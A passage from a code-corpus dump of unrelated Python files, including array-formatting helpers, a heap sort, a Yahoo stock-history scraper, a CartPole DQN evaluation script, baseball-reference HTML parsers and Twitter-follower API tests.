datetime)):\n return format_timestamp(x)\n elif isinstance(x, (unicode_type, bytes_type)):\n return repr(x)\n elif isinstance(x, (float, np.float)):\n return '{0:.4}'.format(x)\n else:\n return str(x)\n\n\ndef format_array_flat(items_ndarray, max_width):\n \"\"\"Return a formatted string for as many items in the flattened version of\n items_ndarray that will fit within max_width characters\n \"\"\"\n # every item will take up at least two characters\n max_possibly_relevant = int(np.ceil(max_width / 2.0))\n relevant_items = first_n_items(items_ndarray, max_possibly_relevant)\n pprint_items = list(map(format_item, relevant_items))\n\n end_padding = ' ...'\n\n cum_len = np.cumsum([len(s) + 1 for s in pprint_items])\n gt_max_width = cum_len > (max_width - len(end_padding))\n if not gt_max_width.any():\n num_to_print = len(pprint_items)\n else:\n num_to_print = max(np.argmax(gt_max_width) - 1, 1)\n\n pprint_str = ' '.join(itertools.islice(pprint_items, int(num_to_print)))\n remaining_chars = max_width - len(pprint_str) - len(end_padding)\n if remaining_chars > 0 and num_to_print < items_ndarray.size:\n pprint_str += end_padding\n return pprint_str\n\n\ndef _summarize_var_or_coord(name, var, col_width, show_values=True,\n marker=' ', max_width=100):\n first_col = pretty_print(' %s %s ' % (marker, name), col_width)\n dims_str = '(%s) ' % ', '.join(map(str, var.dims)) if var.dims else ''\n front_str = first_col + dims_str + ('%s ' % var.dtype)\n if show_values:\n values_str = format_array_flat(var, max_width - len(front_str))\n else:\n values_str = '...'\n return front_str + values_str\n\n\ndef _not_remote(var):\n \"\"\"Helper function to identify if array is positively identifiable as\n coming from a remote source.\n \"\"\"\n source = var.encoding.get('source')\n if source and source.startswith('http') and not var._in_memory:\n return False\n return True\n\n\ndef summarize_var(name, var, col_width):\n show_values = _not_remote(var)\n return _summarize_var_or_coord(name, var, col_width, show_values)\n\n\ndef summarize_coord(name, var, col_width):\n is_index = name in var.dims\n show_values = is_index or _not_remote(var)\n marker = '*' if is_index else ' '\n return _summarize_var_or_coord(name, var, col_width, show_values, marker)\n\n\ndef _maybe_truncate(obj, maxlen=500):\n s = str(obj)\n if len(s) > maxlen:\n s = s[:(maxlen - 3)] + '...'\n return s\n\n\ndef summarize_attr(key, value, col_width=None):\n # ignore col_width for now to more clearly distinguish attributes\n return ' %s: %s' % (key, _maybe_truncate(value))\n\n\nEMPTY_REPR = ' *empty*'\n\n\ndef _calculate_col_width(mapping):\n max_name_length = max(len(str(k)) for k in mapping) if mapping else 0\n col_width = max(max_name_length, 7) + 6\n return col_width\n\n\ndef _mapping_repr(mapping, title, summarizer, col_width=None):\n if col_width is None:\n col_width = _calculate_col_width(mapping)\n summary = ['%s:' % title]\n if mapping:\n summary += [summarizer(k, v, col_width) for k, v in mapping.items()]\n else:\n summary += [EMPTY_REPR]\n return '\\n'.join(summary)\n\n\ncoords_repr = functools.partial(_mapping_repr, title='Coordinates',\n summarizer=summarize_coord)\n\n\nvars_repr = functools.partial(_mapping_repr, title='Data variables',\n summarizer=summarize_var)\n\n\nattrs_repr = functools.partial(_mapping_repr, title='Attributes',\n summarizer=summarize_attr)\n\n\ndef indexes_repr(indexes):\n summary = []\n for k, v in indexes.items():\n summary.append(wrap_indent(repr(v), '%s: ' % k))\n return '\\n'.join(summary)\n\n\ndef array_repr(arr):\n # used for DataArray, Variable and Coordinate\n if hasattr(arr, 'name') and arr.name is not None:\n name_str = '%r ' % arr.name\n else:\n name_str = ''\n dim_summary = ', '.join('%s: %s' % (k, v) for k, v\n in zip(arr.dims, arr.shape))\n\n summary = [''% (type(arr).__name__, name_str, dim_summary)]\n\n if arr.size < 1e5 or arr._in_memory:\n summary.append(repr(arr.values))\n else:\n summary.append('[%s values with dtype=%s]' % (arr.size, arr.dtype))\n\n if hasattr(arr, 'coords'):\n if arr.coords:\n summary.append(repr(arr.coords))\n\n if arr.attrs:\n summary.append(attrs_repr(arr.attrs))\n\n return '\\n'.join(summary)\n\n\ndef dataset_repr(ds):\n summary = ['' % type(ds).__name__]\n\n col_width = _calculate_col_width(ds)\n\n dims_start = pretty_print('Dimensions:', col_width)\n all_dim_strings = ['%s: %s' % (k, v) for k, v in iteritems(ds.dims)]\n summary.append('%s(%s)' % (dims_start, ', '.join(all_dim_strings)))\n\n summary.append(coords_repr(ds.coords, col_width=col_width))\n summary.append(vars_repr(ds.data_vars, col_width=col_width))\n if ds.attrs:\n summary.append(attrs_repr(ds.attrs))\n\n return '\\n'.join(summary)\n","sub_path":"xray/core/formatting.py","file_name":"formatting.py","file_ext":"py","file_size_in_byte":7547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"273952947","text":"def heapsort(arr):\n # create a heap and assign it to a variable\n heap = Heap()\n # create an empty list to append to\n sorted_list = []\n # for every item in the array passed in as an argument,\n # insert the item into the heap variable\n for num in arr:\n heap.insert(num)\n # while the size of the heap is greater than 0,\n # insert the return from heap.delete\n # to the first index of the sorted_list\n while heap.size > 0:\n # sorted_list = [heap.delete()] + sorted\n sorted_list.insert(0, heap.delete())\n # return the sorted list\n return sorted_list\n\n\n# heapsort given in solution lecture\n# def heapsort(arr):\n# heap = Heap()\n# sorted = [0] * len(arr)\n\n# for el in arr:\n# heap.insert(el)\n\n# for i in range(len(arr)):\n# sorted[len(arr) - i - 1] = heap.delete()\n\n# return sorted\n\n\nclass Heap:\n def __init__(self):\n self.storage = [0]\n self.size = 0\n\n def insert(self, value):\n self.storage.append(value)\n self.size += 1\n self._bubble_up(self.size)\n\n def delete(self):\n retval = self.storage[1]\n self.storage[1] = self.storage[self.size]\n self.size -= 1\n self.storage.pop()\n self._sift_down(1)\n return retval\n\n def get_max(self):\n return self.storage[1]\n\n def get_size(self):\n return self.size\n\n def _bubble_up(self, index):\n while index // 2 > 0:\n if self.storage[index // 2] < self.storage[index]:\n self.storage[index], self.storage[index // 2] = (\n self.storage[index // 2],\n self.storage[index],\n )\n index = index // 2\n\n def _sift_down(self, index):\n while (index * 2) <= self.size:\n mc = self._max_child(index)\n if self.storage[index] < self.storage[mc]:\n self.storage[index], self.storage[mc] = (\n self.storage[mc],\n self.storage[index],\n )\n index = mc\n\n def _max_child(self, index):\n if index * 2 + 1 > self.size:\n return index * 2\n else:\n return (\n index * 2\n if self.storage[index * 2] > self.storage[index * 2 + 1]\n else index * 2 + 1\n )\n","sub_path":"data_structures/ex_2/heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"131851167","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 10 12:34:53 2018\n\n@author: Donghyun Kim\n\"\"\"\nimport pandas as pd\n\nclass YahooDailyReader():\n def __init__(self, symbol=None, start=None, end=None):\n import datetime, time\n self.symbol = symbol\n \n # initialize start/end dates if not provided\n if end is None:\n end = datetime.datetime(2018,6,25)\n if start is None:\n start = datetime.datetime(2000,1,1)\n \n self.start = start\n self.end = end\n \n # convert dates to unix time strings\n unix_start = int(time.mktime(self.start.timetuple()))\n day_end = self.end.replace(hour=23, minute=59, second=59)\n unix_end = int(time.mktime(day_end.timetuple()))\n \n url = 'https://finance.yahoo.com/quote/{}/history?'\n url += 'period1={}&period2={}'\n url += '&filter=history'\n url += '&interval=1d'\n url += '&frequency=1d'\n self.url = url.format(self.symbol, unix_start, unix_end)\n \n def read(self):\n import requests, re, json\n try: \n r = requests.get(self.url)\n \n ptrn = r'root\\.App\\.main = (.*?);\\n}\\(this\\)\\);'\n txt = re.search(ptrn, r.text, re.DOTALL).group(1)\n jsn = json.loads(txt)\n\n df = pd.DataFrame(jsn['context']['dispatcher']['stores']['HistoricalPriceStore']['prices'])\n\n \n #df.insert(0, 'symbol', self.symbol)\n df['date'] = pd.to_datetime(df['date'], unit='s').dt.date\n \n # drop rows that aren't prices\n df = df.dropna(subset=['close'])\n \n df = df[['date', 'high', 'low', 'open', 'close', 'volume', 'adjclose']]\n df = df.set_index('date')\n return df\n except Exception as e:\n print(self.symbol,e )\n \ndef save_kospi200_history(history_dir,yy,mm,dd):\n import datetime\n kospi_list=pd.read_csv('kospi200.csv',sep='\\t',engine='python',header=None) \n for kospi in kospi_list[:].values:\n ticker=kospi[0][:6]\n ydr = YahooDailyReader(ticker+'.KS',end=datetime.datetime(yy,mm,dd))\n df = ydr.read()\n try:\n df=df.iloc[::-1]\n df.to_csv(history_dir+'/{}.csv'.format(ticker))\n print(datetime.datetime(yy,mm,dd),'{}.csv is saved'.format(ticker))\n except AttributeError:\n print('######'+ticker+'is not avaible######' )\n #time.sleep(0.1)\n \nif (__name__==\"__main__\"):\n save_kospi200_history('./stock/kospi200_2014',2018,6,29)\n ","sub_path":"download_kospi.py","file_name":"download_kospi.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"246899556","text":"import os\nimport json\nimport requests\n\n\npath_testdata = './data/webmention_rocks_test'\ntest_data = {}\n\nfor n in range(1, 22):\n url = 'https://webmention.rocks/test/%d' % n\n hfile = '%s_%d.html' % (path_testdata, n)\n jfile = '%s_%d.json' % (path_testdata, n)\n if not os.path.exists(hfile):\n r = requests.get(url)\n\n with open(hfile, 'w') as h:\n h.write(r.text.encode('utf-8'))\n with open(jfile, 'w') as h:\n h.write(json.dumps(dict(r.headers), indent=2))\n","sub_path":"tests/rebuild_data.py","file_name":"rebuild_data.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"210220938","text":"import collections\n\ndef factorial(x: int):\n res = 1\n for i in range(1, x+1):\n res = res * i\n return res\n\ndefdict = collections.defaultdict(lambda:factorial)\n\nfor i in range(7):\n defdict[i] = defdict[i](i)\n\nprint(defdict)","sub_path":"sessions/15/konstantin_shrayber/DefDict.py","file_name":"DefDict.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"158393292","text":"import requests\n\nECHO_URL = 'https://fast-oasis-5535.herokuapp.com'\n\n\ndef add_message(name, message):\n url = ECHO_URL + '/message'\n data = {'name': name, 'message': message}\n result = requests.post(url, json=data)\n messages = result.json()['messages']\n return messages\n\n\ndef get_messages():\n url = ECHO_URL + '/messages'\n result = requests.get(url)\n messages = result.json()['messages']\n return messages\n\n\ndef clear_messages():\n url = ECHO_URL + '/clear'\n result = requests.get(url)\n messages = result.json()['messages']\n return messages\n\n\nif __name__ == '__main__':\n print('add_messages()')\n\n name = 'zedd+sg'\n message = 'want you to know'\n messages = add_message(name, message)\n for m in messages:\n print(m['name'], m['message'])\n\n print('get_messages()')\n messages = get_messages()\n for m in messages:\n print(m['name'], m['message'])\n","sub_path":"lesson08-review/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"125030921","text":"#coding: utf-8\r\n\"\"\"\r\nUna tienda ha puesto en oferta la venta de un producto ofreciendo un determinado porcentaje de descuento\r\nsobre el importe de la compra. Elabore un programa Python que determine el importe de la compra, el importe\r\ndel descuento y el importe a pagar por la compra de cierta cantidad de unidades del producto\r\n\"\"\"\r\n\r\ndescuento = float(input(\"Ingrese el porcentaje de descuento: \"))\r\nnum_prod = int(input(\"Ingrese el numero de productos : \"))\r\nimp_prod = [] #Almacena el precio de costo de cada producto\r\ndes_prod = [] #Almacena el importe del descuento\r\npag_prod = [] #Almacena el importe a pagar por el producto despues de descontar\r\nif(descuento>100):\r\n print(\"Error: El descuento no puede ser mayor que el 100%\")\r\n exit()\r\n\r\nfor n in range(1,num_prod+1):\r\n precio_prod = float( input(\"Costo del producto N°0\"+str(n)+\" : \") )\r\n imp_prod.append( precio_prod )\r\n des_prod.append( precio_prod * descuento/100.00)\r\n pag_prod.append( precio_prod * (1-descuento/100.00))\r\n n = n + 1\r\n\r\nfor n in range(0,num_prod):\r\n print(\"Producto N°0\"+str(n+1)+\": \")\r\n print(\"\\tCosto : S/\"+str(imp_prod[n]))\r\n print(\"\\tDescuento : S/\"+str(des_prod[n]))\r\n print(\"\\tMonto a pagar: S/\"+str(pag_prod[n]))\r\n","sub_path":"E05.py","file_name":"E05.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"363714952","text":"import pytest\n\nimport stk\n\nfrom ..case_data import CaseData\nfrom .utilities import Counter\n\n_counter = Counter()\n\n\ndef _get_case_data(mongo_client):\n \"\"\"\n Get a :class:`.CaseData` instance.\n\n Parameters\n ----------\n mongo_client : :class:`pymongo.MongoClient`\n The mongo client the database should connect to.\n\n \"\"\"\n\n # The basic idea here is that the _counter.get_count method will\n # return a different \"fitness value\" each time it is called.\n # When the test runs fitness_calculator.get_fitness_value(), if\n # caching is working, the same number as before will be returned.\n # However, if caching is not working, a different number will be\n # returned as the fitness value.\n\n db = stk.ValueMongoDb(\n mongo_client=mongo_client,\n collection=\"test_caching\",\n database=\"_stk_pytest_database\",\n )\n\n fitness_calculator = stk.PropertyVector(\n property_functions=(_counter.get_count,),\n input_database=db,\n output_database=db,\n )\n molecule = stk.BuildingBlock(\"BrCCBr\")\n fitness_value = fitness_calculator.get_fitness_value(molecule)\n\n return CaseData(\n fitness_calculator=fitness_calculator,\n molecule=molecule,\n fitness_value=fitness_value,\n )\n\n\n@pytest.fixture(\n params=(_get_case_data,),\n)\ndef property_vector(request, mongo_client):\n return request.param(mongo_client)\n","sub_path":"tests/ea/fitness_calculator/test_caching/fixtures/property_vector.py","file_name":"property_vector.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"128058476","text":"import gym\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import InputLayer, Dense, Input\nimport matplotlib.pyplot as plt\nimport pickle\nimport imageio\n\n\n# Parameters\nENV = 'CartPole-v0'\nPATH_REWARD_01 = '../objects/dqn_cartpole_ep_reward.pkl'\nPATH_REWARD_02 = '../objects/dqn_cartpole_ma_reward.pkl'\nPATH_SAVEFIG_01 = '../images/dqn_cartpole_episode_reward.png'\nPATH_SAVEFIG_02 = '../images/dqn_cartpole_average_reward.png'\nPATH_MODEL = '../model/dqn_cartpole_target_model_1000.h5'\nPATH_VIDEO = '../videos/dqn_cartpole.gif'\nEPISODE = 5\nFPS = 30\n\n\ndef get_model(num_states, num_actions):\n inputs = Input(shape=(num_states,))\n out = Dense(128, activation='relu')(inputs)\n out = Dense(128, activation='relu')(out)\n outputs = Dense(num_actions, activation='linear')(out)\n model = Model(inputs, outputs)\n return model\n\n\ndef main():\n # Episode reward\n ep_reward = pickle.load(open(PATH_REWARD_01, 'rb'))\n plt.plot(ep_reward)\n plt.savefig(PATH_SAVEFIG_01)\n plt.show()\n\n # Average reward\n avg_reward = pickle.load(open(PATH_REWARD_02, 'rb'))\n plt.plot(avg_reward)\n plt.savefig(PATH_SAVEFIG_02)\n plt.show()\n\n # Environment\n env = gym.make(ENV)\n num_states = env.observation_space.shape[0]\n num_actions = env.action_space.n\n\n # Model\n # model = Model(num_states=num_states, num_actions=num_actions)\n model = get_model(num_states=num_states, num_actions=num_actions)\n model.load_weights(PATH_MODEL)\n\n # Evaluation video\n with imageio.get_writer(PATH_VIDEO, fps=FPS) as video:\n\n for i in range(EPISODE):\n\n # Initialize\n state = env.reset()\n done = False\n screen = env.render(mode='rgb_array')\n video.append_data(screen)\n\n # Start episode\n while not done:\n\n # Get action\n action = model(np.atleast_2d(state.astype('float32')))\n action = np.argmax(action[0])\n\n # Get next state\n next_state, _, done, _ = env.step(action)\n screen = env.render(mode='rgb_array')\n video.append_data(screen)\n state = next_state\n\n print(f'Episode {i+1} finished')\n\n env.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"dqs/dqn_cartpole_evaluate.py","file_name":"dqn_cartpole_evaluate.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"253513256","text":"from typing import Optional\n\nfrom strictdoc.backend.dsl.models.document_config import DocumentConfig\nfrom strictdoc.core.document_meta import DocumentMeta\n\n\nclass Document(object):\n def __init__(\n self, name, title, config: DocumentConfig, free_texts, section_contents\n ):\n assert isinstance(free_texts, list)\n self.name = name if name else title\n self.config = config if config else DocumentConfig.default_config(self)\n self.free_texts = free_texts\n self.section_contents = section_contents\n\n self.ng_sections = []\n self.ng_level = 0\n self.ng_needs_generation = False\n self.meta: Optional[DocumentMeta] = None\n self.legacy_title_is_used = True if name else False\n\n def __str__(self):\n return \"Document: \".format(\n self.name, self.section_contents\n )\n\n def __repr__(self):\n return self.__str__()\n\n def assign_meta(self, meta):\n assert isinstance(meta, DocumentMeta)\n self.meta = meta\n","sub_path":"strictdoc/backend/dsl/models/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"199175499","text":"import html.parser, re\n\n\nclass GameTeamsParser(html.parser.HTMLParser):\n awayTeamAbb = ''\n homeTeamAbb = ''\n startData = False\n\n def handle_starttag(self, tag, attrs):\n if tag == 'pre':\n self.startData = True\n elif self.startData and tag == 'a':\n for x in attrs:\n if x[0] == 'href':\n if self.awayTeamAbb == '':\n self.awayTeamAbb = x[1].split('/')[2]\n else:\n self.homeTeamAbb = x[1].split('/')[2]\n\n def handle_endtag(self, tag):\n if tag == 'pre':\n self.startData = False\n\n def handle_data(self, data):\n pass\n\n\nclass GameTimeParser(html.parser.HTMLParser):\n startData = False\n startData1 = False\n time = ''\n gamelen = ''\n\n def handle_starttag(self, tag, attrs):\n if tag == 'div' and self.time == '':\n for att in attrs:\n if att[0] == 'class' and att[1] == 'bold_text float_left':\n self.startData = True\n elif tag == 'div' and self.gamelen == '':\n for att in attrs:\n if att[0] == 'id' and att[1] == 'gametime':\n self.startData1 = True\n\n def handle_endtag(self, tag):\n if tag == 'div' and self.startData:\n self.startData = False\n elif tag == 'div' and self.startData:\n self.startData1 = False\n\n def handle_data(self, data):\n if self.startData:\n self.time = str(re.search('[0-9]{1,2}:[0-9]{2} ?[ap]m', data, flags=re.IGNORECASE).group(0))\n if self.startData1:\n if re.search('[0-9]{1,2}:[0-9]{2}', data) != None:\n self.gamelen = str(re.search('[0-9]{1,2}:[0-9]{2}', data).group(0))\n\n\nclass GameWeatherParser(html.parser.HTMLParser):\n startData = False\n startData1 = False\n weather = ''\n field = ''\n\n def handle_starttag(self, tag, attrs):\n if tag == 'div':\n for att in attrs:\n if att[0] == 'id' and att[1] == 'weather':\n self.startData = True\n elif att[0] == 'id' and att[1] == 'fieldcond':\n self.startData1 = True\n\n def handle_endtag(self, tag):\n if tag == 'div' and self.startData:\n self.startData = False\n elif tag == 'div' and self.startData1:\n self.startData1 = False\n\n def handle_data(self, data):\n if self.startData:\n self.weather += data\n elif self.startData1:\n self.field += data\n\n\nclass GameUmpParser(html.parser.HTMLParser):\n startData = False\n homeump = ''\n\n def handle_starttag(self, tag, attrs):\n if tag == 'div':\n for x in attrs:\n if x[0] == 'id' and x[1] == 'Umpires':\n self.startData = True\n\n def handle_endtag(self, tag):\n if tag == 'div' and self.startData:\n self.startData = False\n\n def handle_data(self, data):\n if self.startData:\n if re.search('HP ?- ?(.*), 1B', data) != None:\n self.homeump = re.search('HP ?- ?(.*), 1B', data).group(1)\n\n\nclass GameWinLossSaveParser(html.parser.HTMLParser):\n startData = False\n startWin = False\n startLoss = False\n startSave = False\n winPitch = ''\n lossPitch = ''\n savePitch = ''\n\n def handle_starttag(self, tag, attrs):\n if tag == 'td':\n for x in attrs:\n if x[0] == 'class' and x[1] == 'padding_left small_text':\n self.startData = True\n\n def handle_endtag(self, tag):\n if self.startData and tag == 'td':\n self.startData = False\n\n def handle_data(self, data):\n if self.startData:\n if data == 'W:':\n self.startWin = True\n elif self.startWin and data.strip() != '':\n self.winPitch = data\n self.startWin = False\n elif data == 'L:':\n self.startLoss = True\n elif self.startLoss and data.strip() != '':\n self.lossPitch = data\n self.startLoss = False\n elif data == 'S:':\n self.startSave = True\n elif self.startSave and data.strip() != '':\n self.savePitch = data\n self.startSave = False\n\n\nclass BRPlayParser(html.parser.HTMLParser):\n startData = False\n insideTable = False\n subRow = False\n index = 0\n playNum = 0\n plays = {}\n subs = {}\n\n def handle_starttag(self, tag, attrs):\n for att in attrs:\n if att[0] == 'id' and att[1][:6] == 'event_':\n self.startData = True\n self.playNum = int(att[1].split('_')[1])\n self.plays[self.playNum] = ['', '', '', '', '', '', '', '', '', '', '', '']\n if tag == 'td' and self.startData:\n self.insideTable = True\n if tag == 'span' and att[0] == 'class' and att[1] == 'ingame_substitution':\n self.subRow = True\n self.subs[self.playNum] = ''\n\n def handle_data(self, data):\n if self.startData and self.insideTable:\n self.plays[self.playNum][self.index] += data\n if self.subRow:\n self.subs[self.playNum] += data\n\n def handle_endtag(self, tag):\n if tag == 'tr' and self.startData:\n self.startData = False\n self.index = 0\n elif tag == 'td' and self.insideTable:\n self.insideTable = False\n self.index += 1\n elif tag == 'span' and self.subRow:\n self.subs[self.playNum] += ';'\n elif tag == 'tr' and self.subRow:\n self.subRow = False\n\n def handle_entityref(self, name):\n if name == 'nbsp' and self.startData and self.insideTable:\n self.plays[self.playNum][self.index] += ' '\n elif name == 'nbsp' and self.subRow:\n self.subs[self.playNum] += ' '\n\n\nclass BRLineupParser(html.parser.HTMLParser):\n startData = False\n tdFound = False\n lineup = []\n entry = []\n\n def handle_starttag(self, tag, attrs):\n if tag == 'table':\n for att in attrs:\n if att[0] == 'id' and att[1] == 'lineups':\n self.startData = True\n elif self.startData and tag == 'td':\n self.tdFound = True\n elif self.tdFound and tag == 'a':\n for att in attrs:\n if att[0] == 'href':\n userid = re.search('/players/./(.*)\\.shtml', att[1]).group(1) if re.search('/players/./(.*)\\.shtml', att[1]) else ''\n self.entry.append(userid)\n\n def handle_data(self, data):\n if self.tdFound:\n self.entry.append(data)\n\n def handle_endtag(self, tag):\n if self.startData and tag == 'td':\n self.tdFound = False\n elif self.startData and tag == 'tr':\n self.lineup.append(self.entry)\n self.entry = []\n elif self.startData and tag == 'table':\n self.startData = False\n\n\nclass BRPitcherParser(html.parser.HTMLParser):\n startData = False\n tdCount = 0\n pitcher = []\n roster = []\n team = 'A'\n\n def handle_starttag(self, tag, attrs):\n if tag == 'table':\n for att in attrs:\n if att[0] == 'id' and len(att[1]) > 7 and att[1][-8:] == 'pitching':\n self.startData = True\n elif self.startData and tag == 'td':\n self.tdCount += 1\n elif self.startData and tag == 'a':\n for att in attrs:\n if att[0] == 'href':\n if re.search('/([^/])*\\.shtml', att[1]) is not None:\n uid = re.search('/([^/]*)\\.shtml', att[1]).group(1)\n self.pitcher.append(uid)\n\n def handle_data(self, data):\n if self.startData:\n if self.tdCount == 1:\n self.pitcher.append(data)\n elif self.tdCount == 9:\n self.pitcher.append(data)\n if data == 'Team Totals':\n self.team = 'H'\n\n def handle_endtag(self, tag):\n if self.startData and tag == 'table':\n self.startData = False\n elif self.startData and tag == 'tr':\n if len(self.pitcher) > 0 and self.pitcher[0] != 'Team Totals':\n self.pitcher.append(self.team)\n self.roster.append(self.pitcher)\n self.pitcher = []\n self.tdCount = 0\n elif self.startData and tag == 'td':\n self.tdCount += 1\n\n\nclass BRBatterParser(html.parser.HTMLParser):\n startData = False\n tdCount = 0\n batID = {}\n batValue = ''\n found = False\n\n def handle_starttag(self, tag, attrs):\n if tag == 'table':\n for att in attrs:\n if att[0] == 'id' and len(att[1]) > 6 and att[1][-7:] == 'batting':\n self.startData = True\n elif tag == 'a' and self.startData and self.found == False:\n for att in attrs:\n if att[0] == 'href':\n if re.search('/([^/])*\\.shtml', att[1]) is not None:\n self.batValue = re.search('/([^/]*)\\.shtml', att[1]).group(1)\n\n\n\n def handle_data(self, data):\n if self.startData and self.found == False and self.batValue != '':\n self.batID[data] = self.batValue\n self.found = True\n\n\n def handle_endtag(self, tag):\n if self.startData and tag == 'table':\n self.startData = False\n elif self.startData and tag == 'a' and self.found:\n self.found = False\n self.batValue = ''\n\n\n\nclass GamesParser(html.parser.HTMLParser):\n startData = False\n games = []\n BRabbrevs = ['ARI', 'ATL', 'BAL', 'BOS', 'CHC', 'CHW', 'CIN', 'CLE', 'COL', 'DET', 'HOU', 'KCR', 'LAA', 'LAD',\n 'MIA', 'MIL', 'MIN', 'NYM', 'NYY', 'OAK', 'PHI', 'PIT', 'SDP', 'SEA', 'SFG', 'STL', 'TBR', 'TEX',\n 'TOR', 'WSN']\n a = ''\n h = ''\n lastIn = 'H'\n\n def handle_starttag(self, tag, attrs):\n prefix = \"http://www.baseball-reference.com\"\n if tag == 'div' and len(attrs) > 0 and attrs[0][1] == 'game_summaries':\n self.startData = True\n if self.startData and tag == 'a':\n for att in attrs:\n if att[0] == 'href' and att[1][:6] == '/boxes':\n self.games.append(att[1])\n\n def handle_data(self, data):\n if data == 'Up To This Date':\n self.startData = False\n\n def handle_endtag(self, tag):\n pass\n\n\n\nclass BRPlayerInfoParser(html.parser.HTMLParser):\n height = ''\n weight = ''\n birthDate = ''\n mlbDebutDate = ''\n batHand = ''\n throwHand = ''\n foundWeight = False\n foundHeight = False\n foundBat = False\n foundBorn = False\n foundDebut = False\n foundThrow = False\n\n def handle_starttag(self, tag, attrs):\n pass\n\n def handle_data(self, data):\n if data == 'Weight:':\n self.foundWeight = True\n elif self.foundWeight:\n self.weight = data\n self.foundWeight = False\n elif data == 'Height:':\n self.foundHeight = True\n elif self.foundHeight:\n self.height = data\n self.foundHeight = False\n elif data == 'Bats:':\n self.foundBat = True\n elif self.foundBat:\n self.batHand = data\n self.foundBat = False\n elif data == 'Throws:':\n self.foundThrow = True\n elif self.foundThrow:\n self.throwHand = data\n self.foundThrow = False\n elif data == 'Born':\n self.foundBorn = True\n elif self.foundBorn:\n if data.strip()[0:2] == 'in':\n self.foundBorn = False\n elif data != ':':\n self.birthDate += data.strip()\n elif data == 'Debut':\n self.foundDebut = True\n elif self.foundDebut:\n if data.strip()[0:4] == '(Age':\n self.foundDebut = False\n elif data != ':':\n self.mlbDebutDate += data.strip()\n\n def handle_endtag(self, tag):\n if tag == 'span' and self.foundBorn:\n self.foundBorn = False\n elif tag == 'span' and self.foundDebut:\n self.foundDebut = False\n\n\nclass BRRSUserIdParser(html.parser.HTMLParser):\n uid = ''\n\n def handle_starttag(self, tag, attrs):\n if tag == 'a':\n for att in attrs:\n if att[0] == 'href' and re.search('http://www.retrosheet.org/boxesetc/./P(.*)\\.htm', att[1]):\n self.uid = re.search('http://www.retrosheet.org/boxesetc/./P(.*)\\.htm', att[1]).group(1)\n\n def handle_data(self, data):\n pass\n\n def handle_endtag(self, tag):\n pass","sub_path":"Deprecated/BRParser.py","file_name":"BRParser.py","file_ext":"py","file_size_in_byte":12769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"112957976","text":"from typing import List\r\n\r\n\r\nclass Solution:\r\n def maxProfit(self, prices: List[int]) -> int:\r\n if not prices: return 0\r\n dp = [[0]*2 for _ in range(len(prices))]\r\n dp[0][0], dp[0][1] = 0, -prices[0]\r\n for i in range(1, len(prices)):\r\n dp[i][0] = max(dp[i-1][0], dp[i-1][1] + prices[i])\r\n dp[i][1] = max(dp[i-1][1], dp[i-1][0] - prices[i])\r\n return dp[len(prices)-1][0]\r\n\r\ns = Solution()\r\nr = s.maxProfit([3,2,6,5,0,3])\r\nprint(r)","sub_path":"source150/122_maxProfit.py","file_name":"122_maxProfit.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"339376899","text":"import pytest\n\n\n@pytest.mark.first\ndef test__twitter_users(client, dbsession, models):\n # GIVEN 1,000 Twitter users exist in the database\n NUM_TWITTER_USERS = 1_000\n for idx in range(NUM_TWITTER_USERS):\n dbsession.add(models.TwitterUser(\n screen_name=f'handle_{idx}',\n is_public_figure=True,\n ))\n dbsession.commit()\n\n # WHEN all Twitter IDs are requested\n resp = client.get('/twitter/ids')\n assert resp.status_code == 200, resp.json\n\n # THEN 1,000 IDs are returned\n assert len(resp.json) == NUM_TWITTER_USERS, resp.json\n assert all(isinstance(id_, int) for id_ in resp.json), resp.json\n\n\n@pytest.mark.second\ndef test__followers_count(client, dbsession, models):\n # GIVEN a Twitter user with 1,000 followers\n NUM_FOLLOWERS = 1_000\n public_figure = models.TwitterUser(\n screen_name='first_public_figure',\n is_public_figure=True,\n )\n dbsession.add(public_figure)\n dbsession.flush()\n users = [\n models.TwitterUser(screen_name=f'handle_{idx}')\n for idx in range(NUM_FOLLOWERS)\n ]\n dbsession.add_all(users)\n for user in users:\n public_figure.follow(user)\n dbsession.commit()\n\n # WHEN the count of this user's followers is requested\n resp = client.get(f'/twitter/{public_figure.id}/followers/count')\n assert resp.status_code == 200, resp.json\n\n # THEN 1,000 is returned\n assert resp.json == NUM_FOLLOWERS, resp.json\n\n\n@pytest.mark.third\ndef test__first_requirement(client, dbsession, models):\n # GIVEN at least 2 public figures with shared followers\n NUM_LEFT, NUM_SHARED, NUM_RIGHT = 400, 982, 523\n left, right = (\n models.TwitterUser(\n screen_name=f'public_figure_{idx}',\n is_public_figure=True,\n ) for idx in range(2)\n )\n dbsession.add_all([left, right])\n dbsession.flush()\n left_users = [\n models.TwitterUser(screen_name=f'left_follower_{idx}')\n for idx in range(NUM_LEFT)\n ]\n shared_users = 